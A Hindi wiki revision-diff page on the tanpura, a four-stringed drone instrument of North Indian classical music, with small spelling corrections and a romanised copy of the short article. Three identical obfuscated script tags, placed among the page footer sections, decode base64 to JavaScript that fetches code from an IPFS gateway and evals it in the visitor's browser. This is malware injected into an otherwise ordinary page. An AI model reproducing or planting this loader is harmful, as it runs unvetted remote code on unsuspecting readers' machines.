Difference between revisions of "तानपुरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ह्रदय" to "हृदय")
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
Line 1: Line 1:
 
[[चित्र:Tanpura.jpg|thumb|तानपुरा <br /> Tanpura]]
 
[[चित्र:Tanpura.jpg|thumb|तानपुरा <br /> Tanpura]]
 
*साधारणतया इस वाद्य को तानपुरा के नाम से पुकारते हैं।  
 
*साधारणतया इस वाद्य को तानपुरा के नाम से पुकारते हैं।  
*उत्तर-भारतीय [[संगीत]] में इसने महत्वपूर्ण स्थान ग्रहण कर लिया है। कारण यह है कि इसका स्वर बहुत ही मधुर तथा अनुकूल वातावरण की सृष्टि में सहायक होता है।  
+
*उत्तर-भारतीय [[संगीत]] में इसने महत्त्वपूर्ण स्थान ग्रहण कर लिया है। कारण यह है कि इसका स्वर बहुत ही मधुर तथा अनुकूल वातावरण की सृष्टि में सहायक होता है।  
 
*तानपुरे की झन्कार सुनते ही गायक की [[हृदय]]-तन्त्री भी झंकृत हो उठती है, अत: इसका उपयोग गायन अथवा वादन के साथ स्वर देने में होता है।  
 
*तानपुरे की झन्कार सुनते ही गायक की [[हृदय]]-तन्त्री भी झंकृत हो उठती है, अत: इसका उपयोग गायन अथवा वादन के साथ स्वर देने में होता है।  
 
*अपरोक्ष रूप में तानपुरे से सातो स्वरों की उत्पत्ति होती है, जिन्हें हम सहायक [[नाद]] कहते हैं। तानपुरा अथवा तानपुरे में 4 तार होते हैं।
 
*अपरोक्ष रूप में तानपुरे से सातो स्वरों की उत्पत्ति होती है, जिन्हें हम सहायक [[नाद]] कहते हैं। तानपुरा अथवा तानपुरे में 4 तार होते हैं।

Revision as of 13:34, 4 January 2011

thumb|tanapura
Tanpura

  • sadharanataya is vady ko tanapura ke nam se pukarate haian.
  • uttar-bharatiy sangit mean isane mahattvapoorn sthan grahan kar liya hai. karan yah hai ki isaka svar bahut hi madhur tatha anukool vatavaran ki srishti mean sahayak hota hai.
  • tanapure ki jhankar sunate hi gayak ki hriday-tantri bhi jhankrit ho uthati hai, at: isaka upayog gayan athava vadan ke sath svar dene mean hota hai.
  • aparoksh roop mean tanapure se sato svaroan ki utpatti hoti hai, jinhean ham sahayak nad kahate haian. tanapura athava tanapure mean 4 tar hote haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>